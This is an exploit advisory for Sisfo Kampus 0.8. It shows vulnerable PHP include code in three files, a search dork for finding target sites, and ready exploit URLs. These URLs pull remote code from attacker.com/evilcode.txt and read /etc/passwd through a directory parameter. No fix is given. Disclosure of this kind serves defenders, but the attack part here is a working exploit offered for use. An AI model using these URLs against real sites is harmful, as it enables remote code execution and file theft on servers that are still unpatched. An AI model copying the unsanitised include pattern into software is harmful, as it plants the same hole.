Sisfo Kampus <= 0.8 Remote File Inclusion - Download Vulnerabilities

2006-11-25 00:00:00

# Source Code = Sisfokampus 0.8
#
# Website = www.Sisfokampus.net
#
# Author = E. Setio Dewo ([email protected])
#
# Dorkz : Allinurl: /index.php?exec=


# File Vuln : index.php
# print.php
# download.php ( Local File Include )
#
# Found by : Wawan Firmansyah a.k.a Ang|n
[email protected]

###############################################################################

# Source of index.php

-------------------------[Line 27]-----------------------------
<?php
if ($exec=='main.php' && file_exists("$themedir/main.php"))
include "$themedir/main.php";
else include $exec;
?>
-------------------------[Line 31]------------------------------

# Source Of print.php

-------------------------[Line 15]------------------------------
<?php
include_once "sysfo/sysfo.common.php";

if (isset($_REQUEST['print'])) {
$print = $_REQUEST['print'];
include "$print";
}
else die (DisplayHeader($fmtErrorMsg, $strNoDataTobePrint));

include "disconnectdb.php";
?>
-------------------------[Line 25]-------------------------------

# Source Of download.php

-------------------------[Line 1]--------------------------------
<?php
DisplayHeader($fmtPageTitle, $strDownload);
include "lib/file.common.php";
if (isset($_REQUEST['dir'])) $dir = $_REQUEST['dir'];
else $dir = $Download_dir;
if (substr($dir, -1) != '/' && substr($dir, -1) != '\\') $dir = "$dir/";
DisplayDownloadDir($dir);
?>
-------------------------[Line 8]--------------------------------

##################################################################################

# Exploit of index.php

http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?

# Exploit of print.php
http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
or
http://www.victim.com/index.php?exec=print&print=http://attacker.com/evilcode.txt?

# Exploit of download.php

http://www.victim.com/index.php?exec=download&dir=/etc/passwd

##################################################################################

Greatz :
K-159 ( Thanks for ur Support & Advice )
#cyberbox community in dal.net
#indolinux in dal.net
#edp in dal.net

##################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.